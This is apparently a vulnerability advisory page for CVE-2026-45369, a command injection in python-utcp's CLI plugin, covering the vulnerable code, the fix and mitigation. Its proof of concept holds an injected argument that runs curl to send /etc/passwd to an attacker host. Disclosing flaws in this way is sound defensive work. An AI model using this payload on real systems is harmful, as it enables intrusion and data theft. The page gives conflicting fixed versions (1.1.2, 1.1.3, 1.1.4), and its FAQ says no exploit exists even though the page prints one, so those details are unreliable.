CVE-2026-45369: python-utcp: Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol

Published May 14, 2026
·
Updated

Summary

The substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c (Unix) or powershell.exe -Command (Windows), allowing an attacker to inject arbitrary shell commands.

Affected File

plugins/communicationprotocols/cli/src/utcpcli/clicommunicationprotocol.py

Vulnerable Code

python def replaceplaceholder(match): argname = match.group(1) if argname in toolargs: return str(toolargs[argname]) # No escaping applied

The substituted command is then embedded directly into a shell script:

python scriptlines.append(f'{varname}=$({substitutedcommand} 2>&1)')

And executed via:

python shellcmd = ['/bin/bash', '-c', script]

Proof of Concept

Given a tool defined as: json {"command": "python script.py --input UTCPARGfilenameUTCPEND"}

Calling with: python toolargs = {"filename": "data.csv; curl http://attacker.com/$(cat /etc/passwd | base64)"}

Produces and executes: bash CMD0OUTPUT=$(python script.py --input data.csv; curl http://attacker.com/$(cat /etc/passwd | base64) 2>&1)

This results in full Remote Code Execution on the host system.

Patched

Fixed in utcp-cli 1.1.2. substituteutcpargs now shell-quotes every substituted value: shlex.quote on Unix, a PowerShell single-quoted literal on Windows. Each UTCPARG...UTCPEND placeholder therefore expands to exactly one shell token, blocking metacharacter injection (;, |, &, backticks, $(), newlines).

Behavior change: tools that relied on a single placeholder splitting into multiple shell tokens (e.g. UTCPARGflagsUTCPEND -> --verbose --debug) must now use one placeholder per intended argument.

Mitigation

Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of refusing all attacker-controlled toolargs.

Credit

Reported by @ZeroXJacks.

Other sources

python-utcp is the python implementation of UTCP. Prior to 1.1.3, the substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c (Unix) or powershell.exe -Command (Windows), allowing an attacker to inject arbitrary shell commands. This vulnerability is fixed in 1.1.3.

— MITRE

Affected Software

2 affected componentsFixes available
pypi/python-utcp<1.1.3
pip/utcp-cli<=1.1.1
1.1.2

Event History

May 14, 2026
CVE Published
via MITRE·08:14 PM
Data Sourced
via MITRE·08:14 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·08:56 PM
Data Sourced
via GitHub·08:56 PM
DescriptionSeverityWeaknessAffected Software
Data Sourced
via NVD·09:16 PM
DescriptionSeverityWeakness

Frequently Asked Questions

1

What is the severity of CVE-2026-45369?

CVE-2026-45369 is classified as a high severity vulnerability due to the potential for command injection.

2

How do I fix CVE-2026-45369?

To fix CVE-2026-45369, upgrade to version 1.1.4 or later of python-utcp, or ensure that you are using utcp-cli version 1.1.2 or later.

3

What is the impact of CVE-2026-45369?

The impact of CVE-2026-45369 includes the risk of unauthorized command execution on affected systems.

4

Which versions of python-utcp are affected by CVE-2026-45369?

Versions of python-utcp prior to 1.1.4 are affected by CVE-2026-45369.

5

Is there a known exploit for CVE-2026-45369?

Currently, there is no publicly disclosed exploit specifically for CVE-2026-45369.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203